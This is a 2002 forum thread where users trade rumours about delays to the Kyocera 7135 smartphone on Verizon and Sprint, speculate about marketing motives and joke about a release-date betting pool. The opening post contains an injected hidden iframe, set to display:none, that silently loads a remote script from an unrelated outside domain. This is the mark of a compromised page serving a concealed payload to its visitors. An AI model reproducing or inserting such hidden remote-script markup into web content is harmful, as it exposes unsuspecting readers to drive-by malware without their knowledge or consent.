+ Reply to Thread
Page 1 of 2 1 2 LastLast

Thread: Bad News

Bad News

I heard from a Verizon rep at the Itec we just had here that the 7135 has been delayed till November and might not be out till 03!!
    Am I the only one who is getting sick of these carriers taking there sweet time in approving these phones, while we are drooling at the Kyocera commercials that are on tv...

oh well... Patience is a virtue right!!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    -=Jimmyjoe=-

Mod-Blog's SmartPhone Correspondent
    You know, we should really combine the polling feature with this continuing rumor onslaught about the release of the 7135 and make it into a money-making affair. We could create a betting pool for release dates, let each person put in $5 for a day. Then we take 1/2 the money and use it to maintain the site, use the other 1/2 as prize for the winner.

Seems more interesting than doing a Superbowl pool, but then again I hate Football.

Originally posted by nomad7674
    You know, we should really combine the polling feature with this continuing rumor onslaught about the release of the 7135 and make it into a money-making affair. We could create a betting pool for release dates, let each person put in $5 for a day. Then we take 1/2 the money and use it to maintain the site, use the other 1/2 as prize for the winner.

Seems more interesting than doing a Superbowl pool, but then again I hate Football.
    I'd get in on that. But we'd have to establish what is considered the "release date" since they may not actually give one. It could just start showing up in stores unannounced. I guess the release date could be the first day somebody here gets one from a store? Or receives one they ordered online?
    Please visit my picture site: Robert-O-Rama :)

Re: Bad News

Originally posted by jimmyjoe
    I heard from a Verizon rep at the Itec we just had here that the 7135 has been delayed till November and might not be out till 03!!
    Am I the only one who is getting sick of these carriers taking there sweet time in approving these phones, while we are drooling at the Kyocera commercials that are on tv...

oh well... Patience is a virtue right!!
    JJ just wants to ruin my weekend...
    Dave

Re: Re: Bad News

Originally posted by dwdod
    JJ just wants to ruin my weekend...
    Yeah JJ... thanks a lot dude

Administrator
    well thats good on one hand..

if it does wait out until 1Q '03 or thereabouts, perhaps that will give sprint more time to get on the ball and get it in their system!

think positive sprint lovers out there!!!

Originally posted by marctronixx
    think positive sprint lovers out there!!!
    Ok, how's this.... I positively do NOT want to wait until next year!!! :boing

I don't want to be the nay saying (putting on my flack jacket) but I would wonder "Why" it has been delayed. If its being delay due to a technical issue, then give them all the time they need, however if they are delaying as some sort of marketing plan then "off with their heads." Where are those plans to visit the plant and take control?

I would hate to get the 7135 home and we all have some unforeseen problem with it, and worst yet, the publicly of a major problem would kill it before it could get a good release.

Just some things to think about,

--terry

--terry
    --------------------------------------
    Enjoy the journey, it should be just as much fun as the destination.

Originally posted by WORBC
    I don't want to be the nay saying (putting on my flack jacket) but I would wonder "Why" it has been delayed. If its being delay due to a technical issue, then give them all the time they need, however if they are delaying as some sort of marketing plan then "off with their heads." Where are those plans to visit the plant and take control?

I would hate to get the 7135 home and we all have some unforeseen problem with it, and worst yet, the publicly of a major problem would kill it before it could get a good release.

Just some things to think about,

--terry
    Hey, I'm diggin' your action man. But why should it take so long? Honestly, what is it that Kyocera doesn't know about making a phone that will work with both Sprint and Verizon??? They ain't new to the game.

Those bastages just need to get the 7135 out... plain and simple. You hear me Sprint and Verizon? Huh? Huh? Yeah... I thought so!

Ok, I'm sure that will get things moving

About 2 weeks ago I was told by a trustworthy Verizon insider that it wasn't due until The end of November.

That didn't stop me from selling my iPAQ and accessories yesterday for $450 to cover my costs to upgrade from a 6035

I guess it is time to call him back Monday and double check on any ETA changes...

Larry

[edit - spelling sux]
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16

Re: Bad News

Originally posted by jimmyjoe

oh well... Patience is a virtue right!!
    Who wants to be THAT Virtuous ! :angel2
    Remember, When the long night comes return to the end of the beginning.

I agree with JJ. Its killing me to see the 7135 on the commercials all the time without any idea of when I can go get one!

Originally posted by Robert K.
    Hey, I'm diggin' your action man. But why should it take so long? Honestly, what is it that Kyocera doesn't know about making a phone that will work with both Sprint and Verizon??? They ain't new to the game.

Those bastages just need to get the 7135 out... plain and simple. You hear me Sprint and Verizon? Huh? Huh? Yeah... I thought so!

Ok, I'm sure that will get things moving
    Robert I'm with you dude, but you know that this is all about marketing for loads of companies, and I have seen major industry leaders hold off on marketing a new product to capture a better market position. Now this works in some cases but for this phone, it makes only good sense to have it out before Christmas. Honestly if it was me, I would wait until the 2nd week in December knowing that I would sale out as presents.
    But I'm just as eager to get this new phone as you all are and lets hope that this is only a rumor started by a tech or service rep whom did not have all the facts.

--terry

Originally posted by Jaxxon
    I agree with JJ. Its killing me to see the 7135 on the commercials all the time without any idea of when I can go get one!
    What commercials Jaxxon, are they Verizon? Huh, that's very interesting, usually you will not see a new product being advertised unless its "close to market" due to the short time memory of advertising (on an average it usually takes an individual 7 times seeing/hearing/tasking/smelling something to make the decision to “buy” the product or service). SO I be you the reason why we are getting different stories concerning the 7135’s release is that it will be release in waves in different parts of the country. Geez, I hope not, but I bet you the phones will be released in small markets to judge public reaction.

I hope I'm wrong but some of you may get the phone long before others.

--terry

release date

The release date for Birmingham, AL is set for October 22 according to our Major Accounts Rep for our university and medical center.

I'll be first in line! Thought I'd share some good news for a change.

Administrator
    we will be sure and keep this post in mind when that date shows up... :drink3

Originally posted by marctronixx
    we will be sure and keep this post in mind when that date shows up... :drink3
    Most definitely! :boing

That reminds me.... whatever happened with StarrPCS? I'm gonna go check out the site...

HI all,

What is the latest on the 7135? The last posting on this thread is 10-10-02, almost a month ago. I'm digging but finding nothing... is that because nothing is out there?

-Jack

~'kito
    pdaPhoneHome Moderator

Kyocera 7135

just spoke with Kyocera....they say 7135 will be available at the end of November from Verizon and early in the first quarter of 2003 from Sprint.